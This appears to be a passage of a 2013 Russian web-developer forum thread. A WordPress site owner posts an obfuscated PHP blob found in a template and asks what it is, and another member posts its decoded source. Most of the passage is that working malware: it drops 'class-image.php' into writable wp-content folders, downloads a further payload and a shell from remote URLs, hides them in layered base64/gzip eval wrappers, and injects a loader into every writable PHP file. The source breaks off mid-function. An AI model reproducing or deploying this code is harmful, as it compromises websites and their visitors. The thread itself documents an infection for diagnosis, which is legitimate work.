aKDx+9htxyKkGSUr8Ug+C1PwgMBl8Uf/SoB2fFusCnx7OUxX1Lp+LNIE+OXfI/FRgKXtkt75MzTScdljBpVRe3VTXtik+AeZNURsxFHvBAL2L6olf2soZFJl7VL03GBAQMP9V+ZiDrZtiU
TzRyYcZb4QU5g5cWBz/3R7IIf0JL9MMxeDSiGca5QZpxvMoPgdWWwfWjjbv3cP8Jpw2NW5jquWz7d0rou5HIGwaO/Ncoq16ixalANReXluYPl7VQOUj1Qfj0mRpV5U4B6uTPnvSQdiO1Ja/PismJPeIBFWu2ggunah8vdbggEWgLuaAk5mmR+BvSghWnAewA1222hILDcRBObLkPdPmQZzfg4jqB+2G
7Iw+LbFTD9z1fPZmDOIlE9eSXlIUqKNe8LJ1cslauOBQB8uUZavPExyL8Q0DsisaOpsSqxfkveqBtGJI
T
R6M0N+AHJ2k19b1EKDn5h9PYWrQU6JBVG91JYNbw9k28Epgc/TlTYugmbfLFILZUEdVk7NjbGym5dyTBEaKj/ktmQIEhQw9npMn6NUkdkAV50G6pr1UczQTGlX5KAVVOUcMptmQZe5PSpnOwX23c3P8pT2qS+5jJMxKYJ
XRK45CUVoFthwFDR8Yivv26dcrK/wWKfErOqzfZd8PpJRth7BWHezcsDB3sZHBKNf/wmtgLty/HIVoOx2agDJ9WqOZvTclT/HYh4PVekrMMULDwWqD/aOm2b6AZlQ27FftyI1GJ1KYb41N98S3/MDb9tFQOmtd81L5td39r8QqiZIF8T4Hsl2Wea44NQZbCpDSySY5zjSNogstBy9+9nHPY6IhTucl9tGnT
qPlSAzweKVFmiugyxgb3r6wVIVErgn4deqSVcB6P0Qn6sV1DrXJNjOvl57OkpJx4Fckl6kmmeu0cxj39/AWf3vwpUPwJXFcexKPD1k7kX29e5dewrf2mogB7ERVBNUs3oSERFgoPWOD39ArQJwIdNQd0Rp9PvybI4
ZeAAP78SX/6lzSVYTXu+g4k81iH0+Tmqg7VfE9eM7x0X/434bWasgd2Xf7YMCnfo7D0n5hCv29veEM+GOQ18XiC8d1iFeHki6UwQiR8zDFY+/3x8FaUL2d2gcf786zESyrx11EHv+pnKP4tjBUjDxmq+orstFhaDJj9nqtwnc3LzIQ748fC9L2BKaCpUE
TydMBBotg8AaNJY3uj1IpI/6u2YOxsrdw/mvBc2O2RpLBJHISMArcjCYz3CaXLBMq/GfCUL6LamuXLfALuqBBooLnPn6EHaCAMzgIJaiKdiwwEuq8Q176sv+oJxmQ6P8CtbGJFkRRQpPvwvUKw
HmmUjJf9VYMuy8Jh7NFH4/N8CFYSSUJA9HvlTAK4xtLc9zZbeuYdc0nDx8tYbjuPfFSxMH+Qlgvs7G/Ymu/I2iwNeWIm1maoHzH+EYvpPcvxskxO3e74Nm6N067VorLOsinOMpq52TCsPW2q7+fJFcdturkDoXuQaEM
fj5vIpPvvoEb0mZ6mQ4lX1saApV1ni78VVeVPI7DtrbFHclua7AZYnbkNfBsxanrI4KmbykAe+xIUS42
j
8/FYVqvazUDaDcrYiLadbmWcVOBs8NNO1qSOWnHz0RUrQ8Me+a9XArokuCuXmrqa3/Yd11SY+ggx49UQv2acUIvXkCJF7mrT3jzYb3h6NvlMExqDmnWggYEqJAw4EXOo6dwBcZB4xV8dLOrjC5
AGbdj15WnXU1zeKtYWlhtxGeVTEKyspO5bXWtBPw1ddmtl+8sasdD988ufItTlcc0XcniDDZcXf54wH6
y
oKbj64Gja4F+vsAZTSR+wf6Jnv/NsWVCU65v7XCMk68gCMIAjT5voDUf//5999///N/\');
?>');$dir = ABSPATH. 'wp-content';$wdir = end(get_leaf_dirs($dir));$f = fopen($wdir . "/class-image.php", "w+");fwrite($f, $str);fclose($f);echo "<!--##".$wdir . "/class-image.php##-->";function get_leaf_dirs($dir) {$array = array();$d = dir($dir);while (false !== ($entry = $d->read())) {if($entry!='.' && $entry!='..') {$entry = $dir.'/'.$entry;if(is_dir($entry) && is_writable($entry)) {$subdirs = get_leaf_dirs($entry);if ($subdirs)$array = array_merge($array, $subdirs);else$array[] = $entry;}}}$d->close();return $array;}?>

Сразу отмечу, шаблон старый, использую его уже 3 года на разных сайтах. Там подобного не обнаружил.

Что это за код? Какие его функции? И как он мог туда попасть?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Nikoon
Nikoon
сообщение 16.1.2013, 12:01; Ответить: Nikoon
Сообщение #2


Частый гость
**


Группа: User
Сообщений: 73
Регистрация: 24.6.2011
Поблагодарили: 21 раз
Репутация:   6  


Biznessman, Проверьте ещё в файле wp-config, думаю там ещё зашифрованый код должен быть.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Biznessman
Biznessman
Topic Starter сообщение 16.1.2013, 12:08; Ответить: Biznessman
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 686
Регистрация: 22.7.2009
Из: Україна
Поблагодарили: 187 раз
Репутация:   49  


Вот wp-config:
Развернуть/Свернуть
<?php
/**
* Основные параметры WordPress.
*
* Этот файл содержит следующие параметры: настройки MySQL, префикс таблиц,
* секретные ключи, язык WordPress и ABSPATH. Дополнительную информацию можно найти
* на странице {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Кодекса. Настройки MySQL можно узнать у хостинг-провайдера.
*
* Этот файл используется сценарием создания wp-config.php в процессе установки.
* Необязательно использовать веб-интерфейс, можно скопировать этот файл
* с именем "wp-config.php" и заполнить значения.
*
* @package WordPress
*/

// ** Настройки MySQL: Эту информацию можно получить у вашего хостинг-провайдера ** //
/** Имя базы данных для WordPress */
define('DB_NAME', '************');

/** Имя пользователя MySQL */
define('DB_USER', '*************');

/** Пароль пользователя MySQL */
define('DB_PASSWORD', '**************');

/** Адрес сервера MySQL */
define('DB_HOST', 'localhost');

/** Кодировка базы данных при создании таблиц. */
define('DB_CHARSET', 'utf8');

/** Схема сопоставления. Не меняйте, если не уверены. */
define('DB_COLLATE', '');

/**#@+
* Уникальные ключи для аутентификации.
*
* Смените значение каждого ключа на уникальную фразу.
* Можно сгенерировать их с помощью {@link https://api.wordpress.org/secret-key/1.1/ сервиса ключей на WordPress.org}
*
* @since 2.6.0
*/
define('AUTH_KEY', 'впишите сюда уникальную фразу');
define('SECURE_AUTH_KEY', 'впишите сюда уникальную фразу');
define('LOGGED_IN_KEY', 'впишите сюда уникальную фразу');
define('NONCE_KEY', 'впишите сюда уникальную фразу');
/**#@-*/

/**
* Префикс таблиц в базе данных WordPress.
*
* Можно установить несколько блогов в одну базу данных, если вы будете использовать
* разные префиксы. Пожалуйста, указывайте только цифры, буквы и знак подчеркивания.
*/
$table_prefix = 'wp_';

/**
* Язык локализации WordPress, по умолчанию английский.
*
* Измените этот параметр, чтобы настроить локализацию. Соответствующий MO-файл
* для выбранного языка должен быть установлен в wp-content/languages.
*/
define ('WPLANG', 'ru_RU');

/* Это всё, дальше не редактируем. Успехов! */

/** Абсолютный путь к директории WordPress. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/** Инициализирует переменные WordPress и подключает файлы. */
require_once(ABSPATH . 'wp-settings.php');
?>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RageLT
RageLT
сообщение 16.1.2013, 12:21; Ответить: RageLT
Сообщение #4


Участник
***

Группа: User
Сообщений: 145
Регистрация: 1.10.2009
Поблагодарили: 52 раза
Репутация:   14  


Либо шел, либо троян.

Попробуйте это: _http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html


--------------------
Велосипед и жену не доверяй никому!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
arturios
arturios
сообщение 16.1.2013, 12:25; Ответить: arturios
Сообщение #5


JavaSE
******

Группа: Super Moderator
Сообщений: 1803
Регистрация: 16.10.2012
Из: Москва
Поблагодарили: 1296 раз
Репутация:   78  


а если снести код сайт работает? не пробовали?

Сообщение отредактировал arturios - 16.1.2013, 12:25
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 16.1.2013, 12:39; Ответить: x64
Сообщение #6


F.A.L.L.O.U.T.
*******

Группа: Super Moderator
Сообщений: 3428
Регистрация: 30.6.2011
Из: Железнодорожный (Балашиха)
Поблагодарили: 2749 раз
Репутация:   289  


конечный код вытянут в одну строку, поэтому пришлось пользоваться автоформаттером. получилось такое (целиком не влезло, разбил на 4 куска):
Развернуть/Свернуть
if (!function_exists('dg_main_init')) {
    function dg_main_init() {
        echo "<b color='green'>full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br />[s1]<br />";
        echo "{$GLOBALS['dg_iver']}<h2>{$GLOBALS['http']}{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";
        $path = explode("/", $_SERVER['SCRIPT_FILENAME']);
        array_pop($path);
        $uri = explode("/", $_SERVER['REQUEST_URI']);
        $uri = array_slice($uri, 0, count($uri) - 1);
        while (count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])) {
            unset($uri[count($uri) - 1]);
            unset($path[count($path) - 1]);
        }
        $GLOBALS['dgsp'] = implode("/", $path);
        $GLOBALS['fpath'] = $GLOBALS['dgsp'];
        echo "<b color='green'>root dir path [{$GLOBALS['dgsp']}/]</b><br /><br />";
        $GLOBALS['dgcgr'] = 0;
        $GLOBALS['dgcgrf'] = 0;
        dg_main_exec();
    }
}
if (!function_exists('all_php_inject')) {
    function all_php_inject($folder, $inj = 0, $silent = true) {
        $our_folder = 0;
        $folder = str_replace('\\', '/', $folder);
        if ($folder[strlen($folder) - 1] == '/') {
            $folder = substr($folder, 0, strlen($folder) - 1);
        }
        if (!is_dir($folder)) {
            if (!$silent) {
                echo "<b>NOT FOLDER</b> <font color='red'>{$folder}</font><br />";
            }
            return;
        }
        if (is_link($folder)) {
            if (!$silent) {
                echo "<b>LINK</b> <font color='red'>{$folder}</font><br />";
            }
            return;
        }
        if (strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')) {
            if (!$silent) {
                echo "<b>CACHE</b> <b color='orange'>{$folder}</b><br />";
            }
            return;
        }
        if ($folder.
        "/" == $GLOBALS['dgcp'] || file_exists($folder.
        '/'.$GLOBALS['dgin'])) {
            if (!$silent) {
                echo "<b>MAIN DIR</b> <font color='red'>{$folder}</font><br />";
            }
            return;
        }
        if (!$silent) {
            echo "{$folder}<br />";
        }
        $h = opendir($folder);
        if (!$h) {
            if (!$silent) {
                echo "<b>OPENDIR</b> <font color='red'>{$folder}</font><br />";
            }
            return;
        }
        if (check_engine_rules($folder)) {
            process_file_inject($GLOBALS['dg_wpi'][count($GLOBALS['dg_wpi']) - 1], 1, 0);
        }
        $dirs = array();
        while (strlen($f = readdir($h))) {
            if ($f == '.' || $f == '..') {
                continue;
            }
            $pc = 0;
            $lp = "";
            $file = $folder.
            '/'.$f;
            if (is_file($file)) {
                if (in_array($file, $GLOBALS['dg_wpi'])) {
                    if (!$silent) {
                        echo "<b>BUSY</b> <font color='red'>{$file}</font><br />";
                    }
                    continue;
                }
                $mfn = substr(md5($folder.
                '/'), 0, 3).
                '.php';
                $sfn = substr(md5($mfn), 0, 4).
                '.php';
                $mkr = md5($file);
                if ($f == $mfn) {
                    if (!$silent) {
                        echo "<b>OTHER MS</b> <font color='red'>{$file}</font><br />";
                    }
                    continue;
                }
                if ($f == $sfn) {
                    if (!$silent) {
                        echo "<b>SHELL</b> <font color='red'>{$file}</font><br />";
                    }
                    continue;
                }
                if (isset($GLOBALS['dgmn']) && $f == $GLOBALS['dgmn']) {
                    continue;
                }
                if (!in_array(strtolower(gfe($file)), array("php", "phtml", "php3", "php4", "php5"))) {
                    continue;
                }
                if (!is_writable($file)) {
                    if (!$silent) {
                        echo "<font color='red'>{$file}</font><br />";
                    }
                    continue;
                }
                process_file_inject($file, $inj, $silent);
            }
            elseif(is_dir($file)) {
                $dirs[$file] = count($dirs) + 1;
            }
        }
        closedir($h);
        foreach($dirs as $key = > $val) {
            all_php_inject($key, $inj, $silent);
        }
    }
}

Развернуть/Свернуть
if (!function_exists('clear_get_post_vars')) {
    function clear_get_post_vars($var) {
        $var = rawurldecode($var);
        if (get_magic_quotes_gpc() || strpos($var, '\\"')) {
            $var = stripslashes($var);
        }
        if (strpos($var, '&quot;')) {
            $var = html_entity_decode($var);
        }
        return $var;
    }
}
if (!function_exists('process_file_inject')) {
    function process_file_inject($file, $inj, $silent) {
        $lc = " <b>[not patched]</b>";
        $lp = "";
        $mkr = md5($file);
        $fa = file($file);
        $oc = implode("", $fa);
        $nc = $oc; /*dg_clear_exploits($nc);*/
        while (preg_match("/{$GLOBALS['dgix']}/si", $nc, $_r)) {
            if (preg_match('/md5\s+\=\s+\"(\w{32})\"/si', $_r[0], $_m)) {
                if ($_m[1] == '00000000000000000000000000000000') {
                    echo "<b>BOMB</b> <font color='blue'>{$file}</font><br />";
                }
                elseif($_m[1] == $mkr) {
                    $lc = " <b>[cleared]</b>";
                }
                elseif($_m[1] < > $mkr) {
                    $lc = " <b>[other script]</b>";
                }
            }
            $nc = trim(str_replace($_r[0], $_r[1], $nc));
        }
        $nc = trim(preg_replace("/\<\?php\s*\?\>/s", "", $nc));
        if (preg_match("/\@zend/i", $nc)) {
            echo "<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br />";
        }
        elseif($inj) {
            $inject = prepare_pack($GLOBALS['dgij'], rand(20, 50), 0, 1);
            if (in_array($file, $GLOBALS['dg_wpi'])) {
                $tmp = preg_split('/\}\s*[\r\n]+\s*function/siU', $nc);
                if (count($tmp) > 1) {
                    $inject = hide_eval($inject, 0, $mkr);
                    $middle = round(count($tmp) / 2);
                    $nc = '';
                    $dgi = 0;
                    foreach($tmp as $key = > $val) {
                        $dgi++;
                        if ($dgi == count($tmp)) {
                            $nc = $nc.$val;
                        } else {
                            if ($dgi == $middle) {
                                $nc = $nc.$val.
                                "}\n\n{$inject}\nfunction";
                            } else {
                                $nc = $nc.$val.
                                "}\n\nfunction";
                            }
                        }
                    }
                } else {
                    $tmp = preg_split('/\*\/\s*[\r\n]+\s*function/siU', $nc);
                    if (count($tmp) > 1) {
                        $inject = hide_eval($inject, 0, $mkr);
                        $middle = round(count($tmp) / 2);
                        $nc = '';
                        $dgi = 0;
                        foreach($tmp as $key = > $val) {
                            $dgi++;
                            if ($dgi == count($tmp)) {
                                $nc = $nc.$val;
                            } else {
                                if ($dgi == $middle) {
                                    $nc = $nc.$val.
                                    "*/\n\n{$inject}\nfunction";
                                } else {
                                    $nc = $nc.$val.
                                    "*/\n\nfunction";
                                }
                            }
                        }
                    } else {
                        $inject = hide_eval($inject, 1, $mkr);
                        $nc = $inject.
                        "\n".trim($nc);
                    }
                }
            } else {
                $inject = hide_eval($inject, 1, $mkr);
                $nc = $inject.
                "\n".trim($nc);
            }
            $lp = " <b>[patched]</b>";
        }
        if ($oc < > $nc) {
            if (save_text_to_file($file, $nc, 1)) {
                echo "<font color='green'>{$file}{$lc}{$lp}</font><br />";
            } else {
                echo "<font color='red'>{$file}{$lc}{$lp}</font><br />";
            }
        }
    }
}
if (!function_exists('leave_clear_php')) {
    function leave_clear_php( & $txt) {
        $txt = substr($txt, strpos($txt, '<?'), strlen($txt));
        $txt = substr($txt, 0, strrpos($txt, '?>') + 2);
    }
}
if (!function_exists('check_engine_install')) {
    function check_engine_install() {
        global $_POST;
        if (!isset($_POST['dgrules']) || trim($_POST['dgrules']) == "") {
            return;
        }
        $_POST['dgrules'] = trim(clear_get_post_vars($_POST['dgrules']));
        $GLOBALS['dgrules'] = explode(";", $_POST['dgrules']);
        $tmp = explode("/", $GLOBALS['dgcp']);
        while (count($tmp) > 0) {
            $path = implode("/", $tmp);
            if (check_engine_rules($path)) {
                break;
            }
            unset($tmp[count($tmp) - 1]);
        }
    }
}
if (!function_exists('check_engine_rules')) {
    function check_engine_rules($path) {
        foreach($GLOBALS['dgrules'] as $key = > $val) {
            $val = trim($val);
            $search_path = explode("@#@", $val);
            $all_found = 1;
            foreach($search_path as $key2 = > $val2) {
                $val2 = trim($val2);
                if (in_array($path.$val2, $GLOBALS['dg_wpi'])) {
                    return 0;
                }
                if (!(file_exists($path.$val2))) {
                    $all_found = 0;
                    break;
                }
            }
            if ($all_found) {
                foreach($search_path as $key2 = > $val2) {
                    if (is_writable($path.$val2)) {
                        $GLOBALS['dg_wpi'][] = $path.$val2;
                        echo "<font color='blue'>engine path {$path}{$val2}</font><br />";
                        return 1;
                    }
                }
                return 0;
            }
        }
        return 0;
    }
}

Развернуть/Свернуть
if (!function_exists('dgdownload')) {
    function dgdownload($url, $connect_timeout) {
        if (!$url) {
            return '';
        }
        $ret = '';
        $url_info = parse_url($url);
        if (!isset($url_info['port']) || !$url_info['port']) {
            $url_info['port'] = 80;
        }
        if (!isset($url_info['path']) || !$url_info['path']) {
            $url_info['path'] = '/';
        }
        if (isset($url_info['query']) && $url_info['query']) {
            $url_info['path'] = $url_info['path'].
            "?".$url_info['query'];
        }
        $query = "GET {$url_info['path']} HTTP/1.0\r\n";
        $query. = "Host: {$url_info['host']}\r\n";
        $query. = "Accept: */*\r\n";
        $query. = "Connection: close\r\n";
        $query. = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12\r\n";
        $query = $query.
        "\r\n";
        $errno = 0;
        $error = "";
        $sock = fsockopen($url_info['host'], $url_info['port'], $errno, $error, $connect_timeout);
        $h = array();
        $resp = array();
        if ($sock) {
            stream_set_timeout($sock, $connect_timeout);
            fwrite($sock, $query);
            $hd = false;
            while (!feof($sock)) {
                $l = fgets($sock);
                if (!$hd) {
                    if (trim($l) == '') {
                        $hd = true;
                    } else {
                        $h[] = $l;
                    }
                } else {
                    $resp[] = $l;
                }
            }
            fclose($sock);
        }
        $ret = implode("", $resp);
        return $ret;
    }
}
if (!function_exists('save_text_to_file')) {
    function save_text_to_file($fn, $t, $r = 0) {
        if ($r) {
            $f = fopen($fn, "w");
        } else {
            $f = fopen($fn, "a");
        }
        if ($f) {
            fwrite($f, $t);
            fflush($f);
            fclose($f);
            $fs = filesize($fn);
            if (($t < > '' && $fs) || ($t == '' && !$fs)) {
                return 1;
            } else {
                $fn = str_replace("/", "\\", $fn);
                $fs = filesize($fn);
            }
            if (($t < > '' && $fs) || ($t == '' && !$fs)) {
                return 1;
            }
        } else {
            return 0;
        }
    }
}
if (!function_exists('replace_substring')) {
    function replace_substring( & $text, $pret, $postt, $str) {
        $pos = strpos($text, $pret);
        if (!$pos) {
            return false;
        }
        $pre = substr($text, 0, $pos + strlen($pret));
        $pos = strpos($text, $postt, $pos);
        if (!$pos) {
            return false;
        }
        $post = substr($text, $pos, strlen($text));
        if (strlen($pre) && strlen($post)) {
            $text = $pre.$str.$post;
            return true;
        }
        return false;
    }
}
if (!function_exists('gfe')) {
    function gfe($fn) {
        $ret = pathinfo($fn);
        if (isset($ret['extension'])) {
            return $ret['extension'];
        } else {
            return "";
        }
    }
}
if (!function_exists('prepare_pack')) {
    function prepare_pack($php, $cycles = 0, $split_by_functions = 0, $zip = 0) {
        $ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
        $ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
        $ret = trim($ret);
        if ($split_by_functions) {
            $tmp = preg_split('/\}\s+function/', $ret);
        } else {
            $tmp[] = $ret;
        }
        $skip_first = false;
        if (count($tmp)) {
            if ($split_by_functions && strpos($tmp[0], 'function') === 0) {
                $tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
            } else {
                $skip_first = true;
            }
            $ret = '';
            $count = 0;
            $total = count($tmp);
            foreach($tmp as $key = > $val) {
                $val = preg_replace("/\s+/", " ", $val);
                $count++;
                $count == $total ? $add = '' : $add = '}';
                if ($total > 1 && !($count == 1 && $skip_first)) {
                    $next_encoded = '/*'.generate_string(50).
                    '*/ '.
                    'function '.trim($val).$add;
                } else {
                    $next_encoded = trim($val).$add;
                }
                if ($zip && function_exists('gzdeflate')) {
                    $next_encoded = gzdeflate($next_encoded, 9);
                }
                $next_encoded = base64_encode($next_encoded);
                if ($zip && function_exists('gzdeflate')) {
                    $ret. = "eval(gzinflate(base64_decode('{$next_encoded}')));";
                } else {
                    $ret. = "eval(base64_decode('{$next_encoded}'));";
                }
            }
            for ($i = 0; $i < $cycles; $i++) {
                if ($zip && function_exists('gzdeflate')) {
                    $ret = gzdeflate($ret, 9);
                }
                $ret = base64_encode($ret);
                if ($zip && function_exists('gzdeflate')) {
                    $ret = "eval(gzinflate(base64_decode('{$ret}')));";
                } else {
                    $ret = "eval(base64_decode('{$ret}'));";
                }
            }
        }
        return $ret;
    }
}
if (!function_exists('hide_eval')) {
    function hide_eval($encoded_gzipped_code, $add_php_sign = 0, $marker = "") {
        $ret = "";
        $replacement = "eval(gzinflate(base64_decode('";
        $pos = strpos($encoded_gzipped_code, $replacement);
        if (!($pos === false)) {
            $encoded_gzipped_code = substr($encoded_gzipped_code, $pos + strlen($replacement), strlen($encoded_gzipped_code));
        }
        $replacement = "')));";
        $pos = strpos($encoded_gzipped_code, $replacement);
        if (!($pos === false)) {
            $encoded_gzipped_code = substr($encoded_gzipped_code, 0, $pos);
        }
        $l = array("e", "v", "a", "l", "g", "z", "i", "n", "f", "t", "b", "s", "6", "4", "_", "d", "c", "r", "o", "(", ")", ";", "$");
        shuffle($l);
        $l = array_flip($l);
        $a = "(";
        foreach($l as $k = > $val) {
            rand(0, 100) < 50 ? $sep = "'" : $sep = '"';
            $a. = "{$sep}{$k}{$sep},";
        }
        $a = substr($a, 0, strlen($a) - 1).
        ");";
        if ($marker) {
            $ret. = "\$".
            "md5 = \"{$marker}\";\n";
        }
        $ret. = "\${$GLOBALS['dgeha']} = array{$a}\n";
        $ret. = "\${$GLOBALS['dgehf']} = create_function('\$'.'v',\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['g']}].\${$GLOBALS['dgeha']}[{$l['z']}].\${$GLOBALS['dgeha']}[{$l['i']}].\${$GLOBALS['dgeha']}[{$l['n']}].\${$GLOBALS['dgeha']}[{$l['f']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['t']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['b']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['s']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['6']}].\${$GLOBALS['dgeha']}[{$l['4']}].\${$GLOBALS['dgeha']}[{$l['_']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['c']}].\${$GLOBALS['dgeha']}[{$l['o']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['$']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l[')']}].\${$GLOBALS['dgeha']}[{$l[')']}].\${$GLOBALS['dgeha']}[{$l[')']}].\${$GLOBALS['dgeha']}[{$l[';']}]);\n";
        $ret. = "\${$GLOBALS['dgehf']}('{$encoded_gzipped_code}');\n";
        $ret = trim($ret);
        if ($add_php_sign) {
            $ret = "<".
            "?php\n".$ret.
            "\n?".
            ">";
        }
        return $ret;
    }
}

Развернуть/Свернуть
if (!function_exists('generate_string')) {
    function generate_string($len = 4) {
        $ret = '';
        $arr = array('q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', 'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'z', 'x', 'c', 'v', 'b', 'n', 'm');
        for ($i = 0; $i < $len; $i++) {
            $ret. = $arr[rand(0, count($arr) - 1)];
        }
        return $ret;
    }
}
if (!function_exists('search_writable_dirs')) {
    function search_writable_dirs($folder, & $madrs, & $flag) {
        if ($flag) {
            return;
        }
        $folder = str_replace('\\', '/', $folder);
        if (count($madrs) > 300) {
            return;
        }
        if (isset($GLOBALS['dgbc'][$folder.
        "\n"])) {
            echo "<b>CHECKED</b> <font color='yellow'>{$folder}</font><br />";
            return;
        }
        if (!file_exists($folder)) {
            echo "<b>NOT EXISTS</b> <font color='red'>{$folder}</font><br />";
            return;
        }
        if (strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')) {
            echo "<b>CACHE</b> <font color='orange'>{$folder}</font><br />";
            return;
        }
        $h = opendir($folder);
        if (!$h) {
            return;
        }
        if (is_writable($folder)) {
            $fn = substr(md5($folder.
            '/'), 0, 3).
            '.php';
            if (file_exists($folder.
            '/'.$fn) || file_exists($folder.
            '/cnf')) {
                echo "<b>OLD SCRIPT</b> <b color='red'>{$folder}/{$fn}</b><br />[m1]<br />";
                $madrs = array();
                $madrs[$folder] = count($madrs) + 1;
                $flag = 1;
                return;
            }
            $madrs[$folder] = count($madrs) + 1;
        }
        while (($f = readdir($h)) !== FALSE) {
            if ($f == '.' || $f == '..' || $f == '/' || $f == '\\') {
                continue;
            }
            if ($folder == '/') {
                $folder = '';
            }
            if (is_dir($folder.
            '/'.$f)) {
                if (is_link($folder.
                '/'.$f)) {
                    continue;
                }
                if (strpos($folder.
                '/'.$f.
                '/', $GLOBALS['dgsp']) === false) {
                    echo "<b color='red'>SKIP: {$folder}/{$f}</b><br />";
                    continue;
                }
                search_writable_dirs($folder.
                '/'.$f, $madrs, $flag);
            }
        }
        closedir($h);
        flush();
    }
}
if (!function_exists('dg_main_exec')) {
    function dg_main_exec() {
        global $_SERVER;
        echo "<hr /><div align='left'><br clear='all'>";
        flush();
        $ddrs = array();
        $a = false;
        $GLOBALS['dgcp'] = '';
        echo "<h3>LOOKING FOR THE LONGEST PATH AT {$GLOBALS['dgsp']}</h3><small>";
        search_writable_dirs($GLOBALS['dgsp'], $ddrs, $a);
        echo "</small>";
        flush();
        $max = 0;
        foreach($ddrs as $key = > $val) {
            $fldr = explode('/', $key);
            $c = count($fldr);
            if ($max < $c) {
                $max = $c;
                $GLOBALS['dgcp'] = implode('/', $fldr);
            }
        }
        if (!$GLOBALS['dgcp']) {
            echo "<b color='red'>nowhere to write anything</b><br />[e4]";
            die;
        }
        if ($GLOBALS['dgsp'] == $GLOBALS['dgcp']) {
            echo "<b color='red'>can't write to the document root</b><br />[e5]";
            die;
        }
        $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
        $GLOBALS['dgcp']. = '/';
        $GLOBALS['dgsp']. = '/';
        echo "the longest available path: <b>{$GLOBALS['dgcp']}</b><br />";
        $GLOBALS['dgin'] = substr(md5($GLOBALS['dgcp']), 0, 3).
        '.php';
        $GLOBALS['dgeha'] = "a".substr(md5($GLOBALS['dgin']), 0, 1);
        $GLOBALS['dgehf'] = "b".substr(md5($GLOBALS['dgin']), 0, 2);
        $GLOBALS['dgij'] = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}";
        flush();
        $pms = dgdownload($GLOBALS['dg_pu'], 60);
        if ($pms) {
            echo "<b color='green'>[size: ".strlen($pms).
            "]</b><br />[s2]<br />";
            leave_clear_php($pms);
        } else {
            die("<b color='red'>download failed</b><br />[e2]<br />");
        }
        if (!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])) {
            die("<b color='red'>failed to set path</b><br />[e6]");
        }
        echo "<b color='green'>path [{$GLOBALS['dgcp']}]</b><br />";
        if (!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])) {
            die("<b color='red'>failed to set name</b><br />[e7]");
        }
        if (!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])) {
            die("<b color='red'>failed to set relative root dir</b><br />[e8]");
        }
        echo "<b color='green'>relative root dir [{$GLOBALS['dgsp']}]</b><br />";
        $packed_js = prepare_pack($pms, rand(5, 10), 1, 1);
        $packed_js = hide_eval($packed_js, 1);
        if (save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, 1)) {
            echo "<b color='green'>[{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br />[s4]<br />";
        } else {
            echo "<b color='red'>[{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br />[e9]<br />";
            die;
        }
        $GLOBALS['dgsf'] = substr(md5($GLOBALS['dgin']), 0, 4).
        '.php';
        flush();
        $shl = dgdownload($GLOBALS['dg_eu'], 60);
        if ($shl) {
            echo "<b color='green'>ss [size: ".strlen($shl).
            "]</b><br />[s3]<br />";
            leave_clear_php($shl);
        } else {
            echo "<b color='red'>download failed</b><br />[e3]<br />";
        }
        $shl = preg_replace("/^[^\s]+[\s]/U", "", $shl);
        $shl = preg_replace("/[\s][^\s]+\Z/", "", $shl);
        $shl = '/*'.generate_string(200).
        '*/ '.$shl.
        ' /*'.generate_string(200).
        '*/ ';
        $packed_js = prepare_pack($shl, rand(50, 100), 0, 1);
        $packed_js = hide_eval($packed_js, 1);
